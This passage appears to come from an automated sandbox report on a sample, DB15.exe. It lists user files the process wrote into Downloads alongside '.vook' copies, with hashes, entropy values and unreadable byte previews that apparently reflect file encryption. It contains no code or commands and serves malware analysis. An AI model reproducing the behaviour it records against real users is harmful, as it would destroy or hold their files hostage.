                                                                                                                                                                                                                                      Preview:GAOBCA./.ir..E.D..].i...b.7.R....._.]...`....q..\7DM..R..7..t..p[..h..IWj..n}...U.\.'...g..7..F.a.d.>.0..3B...*..@.7)...wh..m ...uI5f.lB..a2..[.._.E~......x.}&O.,4mY.d...@.N....l)......5..b.j...7.#.8.*.91.nQ.n..>>\O.A6.U.K.......TD.>#.xx..Gi.L..y?..i."9......N..f..Y...K...-.G.]..S.........*..-...4...Uc?*.xl..:..?.P.(.".>P......b.k..T..j.3..N{e... ......A.U{........]X.c.sk......ceD>..|.z.2...c.......`i..$$.V....47./kz.....{Y.q0..;.4FU.:p@.HqX."..4....T..X.{...#...C..$.#.....x...o...=.V.dx.]?...|..S........Ta...V.......b.......D..........Sl.... W..'..G....v...j-...........I4.$....q.D...sx..f..M..*.7_..W.JL...lP"c.3.X.. %.?..y...P..M..r4:....*.B.sVA.h.+p.b.|.S........9l..&`.`..]@...Kn..O.uJT..oC...4....6.Q..6"....?......-...X.tg....G..J.kdj._.."..P{.>........f...h.o..b&ni;f.LR.R<<0....@.C.1=.>........t......m.=0..?.).......Hnj.=.Ofkhi....7p%...Z...q..7y..,......L..iy.......W....<../2..,&..%k.W....%w;o.......T....O^.B..n.0...1j..s*..:....a.-./j...@f.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\GRXZDKKVDB.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8379485181623485
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:SOKoUc+XMr125UqqfgewZZ5XrUgwqjjFiRZYYSMtNKcOwBw+RhBiTkbD:ZKoUzcSqkUgUf9ZtAHYhAiD
                                                                                                                                                                                                                                      MD5:9CF36C670C78A7A29DAD5440774D96B5
                                                                                                                                                                                                                                      SHA1:B60F16AD5E23153197F1E12B63FF4F3C61FFB304
                                                                                                                                                                                                                                      SHA-256:F63C07E74FEBC8E4BB4563A253E348DCA0874B19BF9510DAFC87D22B579DE3EA
                                                                                                                                                                                                                                      SHA-512:A01C91FF55414C2B9CC516C68133F447BDB74CBA1A97AC6F60D4A71C693FFDA751BB8EE1453D1FB11362E11306D17D41E2CD98A8FF7629B9A99B8B14E5AF07DE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZD.%....aJ"l|.j..tf3#.....s....S.v.i.3..t@.........j.?...t.l.x.T.&..8.gnG....^w..> .L].[`r.j..!6`..f"U.>ZO..N.....#3.kf...).F....@..5@.U.......<..[..63.k:.`&....,.6....{....gzA...D.e....J....@..]...^...N..X.VU.X......&O...Z.i...Q.2.[.....T,;7.k[..o'@.[i...X..4e.#....\.=.x....W,y..m.A.T..*..T[.:Wb.5.Ib.........f.R.R.V`v.....R...f......."...@.A...X;........X'q....d.....>R":.y..*.... ...n.=(=.......L..4.1..y.>($...k...sVjc.hv.C...G.....;...Ok.?.....T...E..1,QQ..g%.<..h>k......R..m..9p.,.@.W....\.'...@....aJ...)...........a.SZ.>....`.....7./`....V...@FC.................UO...g..s!W...P}.'.-.......}....jy...$...m.....QKp....r...b...Ve..Nk.]U...+..X:.....Wk.TySm..;&...uj........3Io*..{...R.C.z9.Q..%u1.....z.J$d..f..J...-......6.~6.J:.T...........?........$.~..0.........w.p..8..Ju.k.4i`..T...'.07R......Sg;..[..~.{.z..v..Sw.w8... t?..&.k5Q.l....v.........;.K....<?..#..$....Gm.....*F...04.>....rh.]......L2.U......T.R.pc.......S..b.I.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\GRXZDKKVDB.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8379485181623485
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:SOKoUc+XMr125UqqfgewZZ5XrUgwqjjFiRZYYSMtNKcOwBw+RhBiTkbD:ZKoUzcSqkUgUf9ZtAHYhAiD
                                                                                                                                                                                                                                      MD5:9CF36C670C78A7A29DAD5440774D96B5
                                                                                                                                                                                                                                      SHA1:B60F16AD5E23153197F1E12B63FF4F3C61FFB304
                                                                                                                                                                                                                                      SHA-256:F63C07E74FEBC8E4BB4563A253E348DCA0874B19BF9510DAFC87D22B579DE3EA
                                                                                                                                                                                                                                      SHA-512:A01C91FF55414C2B9CC516C68133F447BDB74CBA1A97AC6F60D4A71C693FFDA751BB8EE1453D1FB11362E11306D17D41E2CD98A8FF7629B9A99B8B14E5AF07DE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZD.%....aJ"l|.j..tf3#.....s....S.v.i.3..t@.........j.?...t.l.x.T.&..8.gnG....^w..> .L].[`r.j..!6`..f"U.>ZO..N.....#3.kf...).F....@..5@.U.......<..[..63.k:.`&....,.6....{....gzA...D.e....J....@..]...^...N..X.VU.X......&O...Z.i...Q.2.[.....T,;7.k[..o'@.[i...X..4e.#....\.=.x....W,y..m.A.T..*..T[.:Wb.5.Ib.........f.R.R.V`v.....R...f......."...@.A...X;........X'q....d.....>R":.y..*.... ...n.=(=.......L..4.1..y.>($...k...sVjc.hv.C...G.....;...Ok.?.....T...E..1,QQ..g%.<..h>k......R..m..9p.,.@.W....\.'...@....aJ...)...........a.SZ.>....`.....7./`....V...@FC.................UO...g..s!W...P}.'.-.......}....jy...$...m.....QKp....r...b...Ve..Nk.]U...+..X:.....Wk.TySm..;&...uj........3Io*..{...R.C.z9.Q..%u1.....z.J$d..f..J...-......6.~6.J:.T...........?........$.~..0.........w.p..8..Ju.k.4i`..T...'.07R......Sg;..[..~.{.z..v..Sw.w8... t?..&.k5Q.l....v.........;.K....<?..#..$....Gm.....*F...04.>....rh.]......L2.U......T.R.pc.......S..b.I.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\IPKGELNTQY.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.867046683883047
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:3P6KLKjCNNzxSEOPCQ7WrZdq7DoPZtjw6OU0MeyRUYSZ2iTkbD:3LLSCDz0ZqQ7WrZdIDcZt86XeyRwZziD
                                                                                                                                                                                                                                      MD5:40B7DC8DDB6AFB2731FE8A8FFA329B3F
                                                                                                                                                                                                                                      SHA1:A0B8EC2ECFF41C996C573078CEF25CB9A2E2C385
                                                                                                                                                                                                                                      SHA-256:3D2F7A9F80A3104D7F5A4536EAB4D960A1D18741B03FCEE22568B0C829D46950
                                                                                                                                                                                                                                      SHA-512:DD920466505081FD5D0825F344C92EFCD28C53BF9E3909DB5AE6C58CC9A408FA3C7B42D1BAD3FD017DF4EB67659D2450520A9D9ADE35DC5AD812752F14C9F8A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE..g.D5."...*l..{..A...m...bLB[A([.e.H..'....EM7/g.....{..X...F6j...M.....7..3 z.....U...U4.d..*.......7z_..t_.I.2...^.#,<.r.....Q...".xq9.....+.4........W.e..#.|%..kY.V..x.....GU.L`.v..*..(D..$.+E`5]u...YD..'|.sn...?!.....>.....p$u.....b#)..y.I7j-)>2.0...AKd.....b') .Wn.B.?.[:....4.M0\H42.Q.K.$b..Y..fRi...q6=.!bC.&*.....2.W%q....Q^.P....I...aw.CrJ..._.u......6..S.......{....................,..DO.+......j..R........K# ON.F....V.... ....^.r..N1H...m.%fR[...t\.[...._).Y....s_(.wO^0....T....Q.L.c..C ...../<@9.x..O...7...2.UC..kK4..l8....(L....B6:y.h8*;el....{.Q...J...g5h...2[..!u.!..e....X.e..6u/.]>....B..P#...Y....P*....w.X...O...X.+..3.L.v...|q....?m.......hY.#...l..+.....L.e+7{`.>h.h.^._.,.p........K.3.AclS.%.......[..t~@....zg-.WsUsj.....5T.....T.D..=.....ms...h.).-.OP.+.&.}.Z.P)wn#....~.....p.F.r../....eB.Z.49..ml(.@........t..X......A....AO7...X.&.,:..R................=O..........|6]..t...@.L9....H..+r3.. .?..`'.I..|.nFN..n.k2

                                                                                                                                                                                                                                      C:\Users\user\Downloads\IPKGELNTQY.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.867046683883047
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:3P6KLKjCNNzxSEOPCQ7WrZdq7DoPZtjw6OU0MeyRUYSZ2iTkbD:3LLSCDz0ZqQ7WrZdIDcZt86XeyRwZziD
                                                                                                                                                                                                                                      MD5:40B7DC8DDB6AFB2731FE8A8FFA329B3F
                                                                                                                                                                                                                                      SHA1:A0B8EC2ECFF41C996C573078CEF25CB9A2E2C385
                                                                                                                                                                                                                                      SHA-256:3D2F7A9F80A3104D7F5A4536EAB4D960A1D18741B03FCEE22568B0C829D46950
                                                                                                                                                                                                                                      SHA-512:DD920466505081FD5D0825F344C92EFCD28C53BF9E3909DB5AE6C58CC9A408FA3C7B42D1BAD3FD017DF4EB67659D2450520A9D9ADE35DC5AD812752F14C9F8A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE..g.D5."...*l..{..A...m...bLB[A([.e.H..'....EM7/g.....{..X...F6j...M.....7..3 z.....U...U4.d..*.......7z_..t_.I.2...^.#,<.r.....Q...".xq9.....+.4........W.e..#.|%..kY.V..x.....GU.L`.v..*..(D..$.+E`5]u...YD..'|.sn...?!.....>.....p$u.....b#)..y.I7j-)>2.0...AKd.....b') .Wn.B.?.[:....4.M0\H42.Q.K.$b..Y..fRi...q6=.!bC.&*.....2.W%q....Q^.P....I...aw.CrJ..._.u......6..S.......{....................,..DO.+......j..R........K# ON.F....V.... ....^.r..N1H...m.%fR[...t\.[...._).Y....s_(.wO^0....T....Q.L.c..C ...../<@9.x..O...7...2.UC..kK4..l8....(L....B6:y.h8*;el....{.Q...J...g5h...2[..!u.!..e....X.e..6u/.]>....B..P#...Y....P*....w.X...O...X.+..3.L.v...|q....?m.......hY.#...l..+.....L.e+7{`.>h.h.^._.,.p........K.3.AclS.%.......[..t~@....zg-.WsUsj.....5T.....T.D..=.....ms...h.).-.OP.+.&.}.Z.P)wn#....~.....p.F.r../....eB.Z.49..ml(.@........t..X......A....AO7...X.&.,:..R................=O..........|6]..t...@.L9....H..+r3.. .?..`'.I..|.nFN..n.k2

                                                                                                                                                                                                                                      C:\Users\user\Downloads\MXPXCVPDVN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849391718284886
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ud2/KqVnk5BwIsLNMc2K5wOfJOaJYKydJIm0PzmwIgS7tN5A2IRmnVN57GoiTkbD:UdU/VkWN2K5wOfJOaydS9zdSpAZRu56I
                                                                                                                                                                                                                                      MD5:BA48F53C051DCB4D5CCB003B5D23E8B2
                                                                                                                                                                                                                                      SHA1:AAEF448A9CE47849B47C872AAEECB1C1E88227CC
                                                                                                                                                                                                                                      SHA-256:91C293F288FADF2BCEB823485BE24C8C656755CAA9E21BE9D2401DA13CFA25B2
                                                                                                                                                                                                                                      SHA-512:0EC6DD51C312D90EBCA6438F01B9FD012A086504468E5AFC743F59F83A29F961509D621EEA137245CA30D9F232E7053599376AD1EEFF0DA800D744F71E12B47C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXCDa.;. 9..?.}.........p-Mh.t..C8......VS_6.o}K...y.8....t...$*...eu.H.k..T.`f.l.~.C...\..nU...*?J....Id.7.....Iu.}.U...-g...s38._|#:.&.~=..H.v.Q.)-...e.,...4B....V@E\V..)...n...5$...&y........~.2.[11...[..M..i.0...J.e...?n. )..b.....'.[."O.J!E...3...M.../.t..$1%cY=...B.O...$tBXH..:sZVsY.....Vd...H...U..G....U.|.Ll..6..Q.r.k..o):.I..vW.$I3..}.~u>..cz.,g..}.vn..........f...v...V.7.....#._...3..X..FM..-..i.....7..........Z..?.9jZ!..S..;...jx.....&....dW..jk...:.....zk.T.O.tq.)d3.e...eu:D..5.7.:-......k..b!|.X.?..I.2.@..[....[.q.{..v.&=q...S>+b.-....t~...a.......W....%.-.K.\.#._w..~R".`......{f...q..eb..t.j$2%\I.......i.\...Wl.#....CV*.f-..$).`.. .z...>....~.Y.\.3..)...J._c..d ....T7w\..-Lj....M.z..d.Xd.Zoo)l6."e...`..7..:.i.@..........C..}.c...w...............n....OB..%.!=...N..A..P.V.".'^.f.;z..>..}7.x...t...._)./&.v(..hx...Rv.....a>7.f...o9...t..g....k....{..J8..1@...k....k..o?TXX.,8C....q.f..M.Z.o.0......h{G........

                                                                                                                                                                                                                                      C:\Users\user\Downloads\MXPXCVPDVN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849391718284886
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ud2/KqVnk5BwIsLNMc2K5wOfJOaJYKydJIm0PzmwIgS7tN5A2IRmnVN57GoiTkbD:UdU/VkWN2K5wOfJOaydS9zdSpAZRu56I
                                                                                                                                                                                                                                      MD5:BA48F53C051DCB4D5CCB003B5D23E8B2
                                                                                                                                                                                                                                      SHA1:AAEF448A9CE47849B47C872AAEECB1C1E88227CC
                                                                                                                                                                                                                                      SHA-256:91C293F288FADF2BCEB823485BE24C8C656755CAA9E21BE9D2401DA13CFA25B2
                                                                                                                                                                                                                                      SHA-512:0EC6DD51C312D90EBCA6438F01B9FD012A086504468E5AFC743F59F83A29F961509D621EEA137245CA30D9F232E7053599376AD1EEFF0DA800D744F71E12B47C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXCDa.;. 9..?.}.........p-Mh.t..C8......VS_6.o}K...y.8....t...$*...eu.H.k..T.`f.l.~.C...\..nU...*?J....Id.7.....Iu.}.U...-g...s38._|#:.&.~=..H.v.Q.)-...e.,...4B....V@E\V..)...n...5$...&y........~.2.[11...[..M..i.0...J.e...?n. )..b.....'.[."O.J!E...3...M.../.t..$1%cY=...B.O...$tBXH..:sZVsY.....Vd...H...U..G....U.|.Ll..6..Q.r.k..o):.I..vW.$I3..}.~u>..cz.,g..}.vn..........f...v...V.7.....#._...3..X..FM..-..i.....7..........Z..?.9jZ!..S..;...jx.....&....dW..jk...:.....zk.T.O.tq.)d3.e...eu:D..5.7.:-......k..b!|.X.?..I.2.@..[....[.q.{..v.&=q...S>+b.-....t~...a.......W....%.-.K.\.#._w..~R".`......{f...q..eb..t.j$2%\I.......i.\...Wl.#....CV*.f-..$).`.. .z...>....~.Y.\.3..)...J._c..d ....T7w\..-Lj....M.z..d.Xd.Zoo)l6."e...`..7..:.i.@..........C..}.c...w...............n....OB..%.!=...N..A..P.V.".'^.f.;z..>..}7.x...t...._)./&.v(..hx...Rv.....a>7.f...o9...t..g....k....{..J8..1@...k....k..o?TXX.,8C....q.f..M.Z.o.0......h{G........

                                                                                                                                                                                                                                      C:\Users\user\Downloads\MXPXCVPDVN.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.869148842707591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mk3K5A6eCb2lw0YNgEYnnaW+FrOn4M+IpXaA3XNWnfZhUyX1g0LKliTkbD:mk6598w0SgnnadS4gpKA3sv7FgeKciD
                                                                                                                                                                                                                                      MD5:649E58250B6E377CE9031EA0883ECE4F
                                                                                                                                                                                                                                      SHA1:34ECCF0B04527824710C112B883B9AF207CE127E
                                                                                                                                                                                                                                      SHA-256:8950E785C733C2B0829AD33CC58B5040154F7D64B6BF2A7153D6515447CFF6A5
                                                                                                                                                                                                                                      SHA-512:7C02B432EEB3F550C170BEA2D09DE470393044CE123D1193B8B8159E3AB8E1E8756A89F741B83B5BCAEE15AC9EFC2D482EA1A802B3D63B5247A76FD6E6ADAFD3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC.n......ZK.....=(.H3:.o&..q3b7..*.`t....x]..2.Q4.b8-(/Z....t...Xp....o.....C.....R.!.Ghj..[.....SV:..).[...=..[..RH.....a......H.NyqN...Q.VV.5.bt.z.5&..D:.$...wP&...M...y.`.S.g.....OF;..a.Yl.N.\.)._S...Mo..i.wR.#.....6.c.... ...N]=9....f.....@..-._[U.Q.D=...l8..%U.(..@.[.zg..?m.$..........7.....3....z.......s...2/.6:P.I...:.p...>.e..q.+.^..J[......L.$..........B.e..@eT..2,v.....|..6v.v.....+.%...7...M;ed.s>..!>."..+r.<.l..b.L.U.;.j..G`.{.?.j..,}.j.Z~bY,.8..#?.P....k.....\...i.......`0....Q_E#L#;>.......>.Yu..:.B..=.I...@:.&.]6.5..9nX....U .Y.7.A..j..>....aJ...y..0..9..Ss.r.Jk.......,.N...'....Wm....._......B....S..p.......X..A.3........&z.A...A....}.@..yR...H+f.+..~...!. .....n! T....N0.V..@..g.x.m1../.c.[...L!X..V.&..I.nQe+;.s9<|..7.....&..5P.+>...Dp1$..;...)....li...m.A.....-..cGa.}U.w..oM..%.=.....(l..+....`.u\..2o..n.|o...Y.zf.V.[Y....P..E.....L......'A..-r7....T.),...H....j.Se.2......"..gAF....!..v....6.w....F....<.....]A..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\MXPXCVPDVN.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.869148842707591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mk3K5A6eCb2lw0YNgEYnnaW+FrOn4M+IpXaA3XNWnfZhUyX1g0LKliTkbD:mk6598w0SgnnadS4gpKA3sv7FgeKciD
                                                                                                                                                                                                                                      MD5:649E58250B6E377CE9031EA0883ECE4F
                                                                                                                                                                                                                                      SHA1:34ECCF0B04527824710C112B883B9AF207CE127E
                                                                                                                                                                                                                                      SHA-256:8950E785C733C2B0829AD33CC58B5040154F7D64B6BF2A7153D6515447CFF6A5
                                                                                                                                                                                                                                      SHA-512:7C02B432EEB3F550C170BEA2D09DE470393044CE123D1193B8B8159E3AB8E1E8756A89F741B83B5BCAEE15AC9EFC2D482EA1A802B3D63B5247A76FD6E6ADAFD3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC.n......ZK.....=(.H3:.o&..q3b7..*.`t....x]..2.Q4.b8-(/Z....t...Xp....o.....C.....R.!.Ghj..[.....SV:..).[...=..[..RH.....a......H.NyqN...Q.VV.5.bt.z.5&..D:.$...wP&...M...y.`.S.g.....OF;..a.Yl.N.\.)._S...Mo..i.wR.#.....6.c.... ...N]=9....f.....@..-._[U.Q.D=...l8..%U.(..@.[.zg..?m.$..........7.....3....z.......s...2/.6:P.I...:.p...>.e..q.+.^..J[......L.$..........B.e..@eT..2,v.....|..6v.v.....+.%...7...M;ed.s>..!>."..+r.<.l..b.L.U.;.j..G`.{.?.j..,}.j.Z~bY,.8..#?.P....k.....\...i.......`0....Q_E#L#;>.......>.Yu..:.B..=.I...@:.&.]6.5..9nX....U .Y.7.A..j..>....aJ...y..0..9..Ss.r.Jk.......,.N...'....Wm....._......B....S..p.......X..A.3........&z.A...A....}.@..yR...H+f.+..~...!. .....n! T....N0.V..@..g.x.m1../.c.[...L!X..V.&..I.nQe+;.s9<|..7.....&..5P.+>...Dp1$..;...)....li...m.A.....-..cGa.}U.w..oM..%.=.....(l..+....`.u\..2o..n.|o...Y.zf.V.[Y....P..E.....L......'A..-r7....T.),...H....j.Se.2......"..gAF....!..v....6.w....F....<.....]A..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NEBFQQYWPS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860050552642227
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:azSViAUvYriDg7hSSokvoJvDWr5EBstPOsZ+yj0sRXV3UNSXgHoh3hBiTkbD:azSViAUv47hSNkvavDDBOO2+YVRqgXgu
                                                                                                                                                                                                                                      MD5:A6B34D4E58ED1FF0F286CA40EA4E8E94
                                                                                                                                                                                                                                      SHA1:30E85DD38572A20FAA9EF1FFFA74D70F7E894C0F
                                                                                                                                                                                                                                      SHA-256:54330E63B92525416961919A2548AC9252B7C63D3F54E497087318EC65D2BCE6
                                                                                                                                                                                                                                      SHA-512:D00989C82584DBD4B52D178B7E68E2427EA83E282C150F0FF8EF165A23DE44191A2C88BF499B730F2C580A2FD8DE568D5D3C297E5E9EDDA286E8F4B3192D5A52
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQU-...M.._7..=m...(....;K5G6zL.-..u.Q...,.....F.Bz.. ..:[..X......zB./...p1MD..;]........P'v......S1A(@&..(R)...fO...U..M..Z.z.-....\. *...0.*.t."&.......v.M...$.#6.W,..b.!t8C.......B#~4........vH&e....X~....x'...#.}8.uFw.?...A..UjN.hf........k........S.N...E@9B......B..#.2.....s^......B..2s....wp{..q...H8.....`n...$.s.i.....`E.HHw.iLIEc.ZG.,v...V....w!G..:9..>..;#r-....x3g..n.oZ.[...]8..M...>t..."D.....Vm......C.!.9....A..c....z....UG.|f(^L&(..5N...'Z...C.."..=...pu,.X.......1.'...XVL..........Q..o..v......P5..........r.......P...tkx^a#..I..r.K..P..@......Q.w.4.E$...O8.. ..$.Z?..^..aXu.K.....S..,....<...._.Q...t<".!N%.... ...d=...f..c..I3..R..e.H.....V!.......9..~T..l.......JJ....[)....L.P]....[..W..0...S....&b:...%`.....A...q.Q...w.....i..A.R....W......2..A..~..e).O....-.O..........@.Y.z..D(.C.....Q4..*...7.*).Z.!..%i...*.&%..K.........|57.[.l.dR.G..................zw.B....`B.}..n..M.5T....M:c..#.A.{..~..i.m..s.Dd..B.....dSS..{..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NEBFQQYWPS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860050552642227
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:azSViAUvYriDg7hSSokvoJvDWr5EBstPOsZ+yj0sRXV3UNSXgHoh3hBiTkbD:azSViAUv47hSNkvavDDBOO2+YVRqgXgu
                                                                                                                                                                                                                                      MD5:A6B34D4E58ED1FF0F286CA40EA4E8E94
                                                                                                                                                                                                                                      SHA1:30E85DD38572A20FAA9EF1FFFA74D70F7E894C0F
                                                                                                                                                                                                                                      SHA-256:54330E63B92525416961919A2548AC9252B7C63D3F54E497087318EC65D2BCE6
                                                                                                                                                                                                                                      SHA-512:D00989C82584DBD4B52D178B7E68E2427EA83E282C150F0FF8EF165A23DE44191A2C88BF499B730F2C580A2FD8DE568D5D3C297E5E9EDDA286E8F4B3192D5A52
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQU-...M.._7..=m...(....;K5G6zL.-..u.Q...,.....F.Bz.. ..:[..X......zB./...p1MD..;]........P'v......S1A(@&..(R)...fO...U..M..Z.z.-....\. *...0.*.t."&.......v.M...$.#6.W,..b.!t8C.......B#~4........vH&e....X~....x'...#.}8.uFw.?...A..UjN.hf........k........S.N...E@9B......B..#.2.....s^......B..2s....wp{..q...H8.....`n...$.s.i.....`E.HHw.iLIEc.ZG.,v...V....w!G..:9..>..;#r-....x3g..n.oZ.[...]8..M...>t..."D.....Vm......C.!.9....A..c....z....UG.|f(^L&(..5N...'Z...C.."..=...pu,.X.......1.'...XVL..........Q..o..v......P5..........r.......P...tkx^a#..I..r.K..P..@......Q.w.4.E$...O8.. ..$.Z?..^..aXu.K.....S..,....<...._.Q...t<".!N%.... ...d=...f..c..I3..R..e.H.....V!.......9..~T..l.......JJ....[)....L.P]....[..W..0...S....&b:...%`.....A...q.Q...w.....i..A.R....W......2..A..~..e).O....-.O..........@.Y.z..D(.C.....Q4..*...7.*).Z.!..%i...*.&%..K.........|57.[.l.dR.G..................zw.B....`B.}..n..M.5T....M:c..#.A.{..~..i.m..s.Dd..B.....dSS..{..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NEBFQQYWPS.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.872634818440082
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:NP2ASNr2kUbJ2LuYl+tTojUNmrtGvA+Rzbtj7BoxWQVeozzHyZ9RCJBmiTkbD:NP2AwUsLuYl+iogrtQHx3BIrknhyBDiD
                                                                                                                                                                                                                                      MD5:78621F4BC5FEEFFE4B57BCA6904F05CC
                                                                                                                                                                                                                                      SHA1:DF64D9385DE287C4984BCC01D9B416ED85626B83
                                                                                                                                                                                                                                      SHA-256:F1AED6432A0E61B55D3C452A9EB8613AB4FAB567D546B8B5AD01D62303E40404
                                                                                                                                                                                                                                      SHA-512:6B889361045E7DD3883140B6030B00383EC8F7A87E933C7B13D19A76B132E81F682016DD6D76AB9ADDA82CA8AA66590EF06E3818B359BD4EFC1C0240B64CF7D3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ#. g#+z..{ON..".g....cdY......0e..>.d.U.5j.....LW%.L...T..DH.7....$..i.va`...k....t..$...l #.^...........h......WY.M(.......&..L.<..,.2$..Y...T7.xoJ.$.p.....4.,_.]a.Q..~..e.eJ....=..0N..S..O3.....e....'..b..er?>%.b...O..o.n...:G..b..k.....\.).L..1.!l.]qe.T'j._.>^.d....ge...D.8.O...m.....g.j....b7M..{}../([......=....$%j.9.....KD% Y...Siq:.!...Q$......3..e..............&.-...G.uP..)qru.........Nk..df4....D.[^..E....&.'.B..kg...\H.[.+M....K3....[.J16..,. ..w.3@~...^.<.....#.t.\.A....t...`nTV.W.Gvn...".....j]..F.}....[k"...,.v.. ..I.k;]...L...k5u..;.....O[(.......pT......t..R.c........(..3.};-.q.................@.$.I.........`...dI.....FD.6.l..M..:.|A.@n..c.K....@.o.p...:.gM..j..s......A#.....0AVf...g..4......+..)..FX:n..@.u=.iJ.n.......o|.e.dO....R.Y...`...._.Z..v.6Hl.r.. a?..A.7.(..b.v.<.....).:^...;....F....z/.}...*...m.\.x.?N..O.N..O..T.../[m...p../.1].i%.I?.Up~...'v.q..!U.D....E?............7!...N.......!.l.m.A..J.e...r.Vh...\.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\NEBFQQYWPS.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.872634818440082
                                                                                                                                                                                                                                      Encrypted:false
